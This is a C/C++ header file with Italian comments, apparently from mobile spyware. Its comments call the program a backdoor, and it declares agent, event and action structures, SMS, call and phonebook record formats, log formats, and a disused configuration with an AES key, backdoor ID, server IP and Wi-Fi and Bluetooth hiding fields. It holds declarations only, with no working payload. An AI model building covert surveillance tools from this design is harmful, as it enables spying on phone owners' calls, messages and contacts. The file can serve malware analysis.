#ifndef __Common_h__
#define __Common_h__

#include <windows.h>
#include <list>
#include <map>
#include <vector>
#include <new>

using namespace std;

/**
* Define comuni
*/
#define MAX_ALLOCABLE_MEMORY 1024 * 1024 // 1 Mb (il define dovrebbe essere multiplo di 16)
#define LOG_VERSION_01 (UINT)0x00000001

/**
* Define per l'accesso concorrente
*/
#define WAIT_AND_SIGNAL(x)	while(x){ MiniSleep(350); } x = TRUE;
#define WAIT(x)				while(x){ MiniSleep(350); };
#define UNLOCK(x)			x = FALSE;

/**
* Stato dell'agente
*/
#define AGENT_DISABLED	(UINT)0x0
#define AGENT_STOPPED	(UINT)0x0
#define AGENT_RUNNING	(UINT)0x1
#define AGENT_ENABLED	(UINT)0x1
#define AGENT_CLOSING	(UINT)0x2

/**
* Struttura che definisce la configurazione globale della backdoor
*/
/*typedef struct _ConfStruct{
	BYTE AesKey[32];		// -> Inizializzata a 0xBAB0BAB0.... *
	WCHAR ConfName[32];		// -> Inizializzata a 0xC00DC00DC00D... (scramblato!)
	WCHAR LogDirName[32];	// -> Inizializzata a 0xF0CAF0CA...
	BYTE BackdoorID[8];		// -> Inizializzata a 0xD00FD00F *
	BYTE BTMacAddress[6];	// -> Inizializzata a 0xBACABACA
	BYTE WifiMacAddress[6];	// -> Inizializzata a 0xFACAFACA
	WCHAR WifiSSID[32];		// -> Inizializzata a 0xBABEBABE
	BYTE BTPin[8];			// -> Inizializzata a 0xB00BB00B (il PIN e' in ASCII!!!!)
	BYTE WifiKey[32];		// -> Inizializzata a 0xCAFECAFE
	UINT WifiKeyLen;		// -> Inizializzata a 0xF0DAF0DA
	BYTE Version[8];		// -> Anno/mese/giorno *
	BYTE UniqueKey[16];		// -> Inizializzata a 0xCACACACA
	DWORD ServerIP;			// -> Inizializzata a 0xFFAAEEBB
	BYTE ServerIPv6[16];	// -> Inizializzata a 0xF0F0F0
}ConfStruct, *pConfStruct;*/

typedef struct _ConfStruct{
	UINT uConfId;		// Id dell'opzione
	UINT uParamLength;	// Lunghezza della memoria allocata per pParams
	PVOID pParams;		// Puntatore alla lista dei parametri
}ConfStruct, *pConfStruct;

/**
* Definizione delle principali strutture comuni
*/
typedef struct _AgentStruct{
	UINT uAgentId;		// Id dell'agente
	UINT uAgentStatus;	// Running, Stopped, Closing
	UINT uParamLength;	// Lunghezza della memoria allocata per pParams
	PVOID pParams;		// Puntatore alla lista dei parametri
}AgentStruct, *pAgentStruct;

typedef struct _EventStruct{
	UINT uEventType;	// Tipo di evento (Timer, sms, call etc...)
	UINT uActionId;		// Id dell'azione da eseguire 
	UINT uParamLength;	// Lunghezza della memoria allocata per pParams
	PVOID pParams;		// Puntatore alla lista dei parametri
	BOOL bTriggered;	// Stato dell'evento (triggered, non triggered)
}EventStruct, *pEventStruct;

typedef struct _ActionStruct{
	UINT uActionType;	// Tag che identifica l'azione
	UINT uParamLength;	// Lunghezza della memoria allocata per pParams
	PVOID pParams;		// Puntatore alla lista dei parametri 
}ActionStruct, *pActionStruct;

typedef struct _MacroActionStruct{
	UINT uSubActions;	// Numero di strutture ActionStruct presenti
	pActionStruct pActions; // Puntatore ad un array di ActionStruct
}MacroActionStruct, *pMacroActionStruct;

typedef struct _DeviceStruct{
	UINT cbSize;
	BOOL bWifiHidingSupported;		// Id dell'azione
	BOOL bWifiAvailable;
	BOOL bWifiActivable;
	BOOL bBTHidingSupported;	// Tipo di azione da eseguire
	BOOL bBTAvailable;
	BOOL bBTActivable;
	BOOL bGpsAvailable;
	BOOL bGpsHidingSupported;
	OSVERSIONINFOEX OsVersionInfoEx;
}DeviceStruct, *pDeviceStruct;

typedef struct _CallStruct{
	UINT cbSize;
	BYTE PhoneNumber[15];
	UINT NameLength;
	BYTE *Name;
}CallStruct, *pCallStruct;

typedef struct _GeneralConf{
	list<AgentStruct *> *pAgents;
	list<EventStruct *> *pEvents;
	list<ActionStruct *> *pActions;
	pConfStruct pConf;
}GeneralConf, *pGeneralConf;

typedef struct _PhoneBook{
	UINT cbSize;
	BYTE PhoneNumber[15];
	UINT NameLength;
	BYTE *Name;
}PhoneBookStruct, *pPhoneBookStruct;

typedef struct _Sms{
	UINT cbSize;
	BYTE Destination[15];
	UINT TextLength;
	union{
		PWCHAR pwText;
		PCHAR pText;
	};
}SmsStruct, *pSmsStruct;

typedef struct _TimerStruct{
	UINT Id;
	UINT Repetition;
	UINT uTime;
}TimerStruct, *pTimerStruct;

/**
* Subito dopo la struttura scriviamo il nome del file in WCHAR, la struttura addizionale
* se necessaria e poi i dati di seguito. Non cambiare MAI l'ordine dei primi 2 membri!
*/
typedef struct _LogStruct{
	UINT cbSize;			// Dimensione della struttura
	UINT uVersion;			// Versione della struttura
	UINT uLogType;			// Tipo di log
	UINT uHTimestamp;		// Parte alta del timestamp
	UINT uLTimestamp;		// Parte bassa del timestamp
	UINT FileSize;			// Lunghezza totale del file
	UINT FileNameLength;	// Lunghezza del nome del file in byte
	UINT uAdditionalData;	// Lunghezza della struttura addizionale, se presente
	WCHAR FileName[1];		// Puntatore al nome del file
}LogStruct, *pLogStruct;

// Dword con l'upadded size del blocco

/**
* Qui definiamo tutti gli extern delle variabili globali necessarie
* al funzionamento della backdoor. Le definizioni si trovano in Common.cpp
*/
extern BYTE		g_Version[];
extern BYTE		g_AesKey[];
extern BYTE		g_BackdoorID[];
extern WCHAR	g_ConfName[];

/**
* Definizione delle funzioni helper comuni
*/
void MiniSleep(UINT uMilliSec);
#endif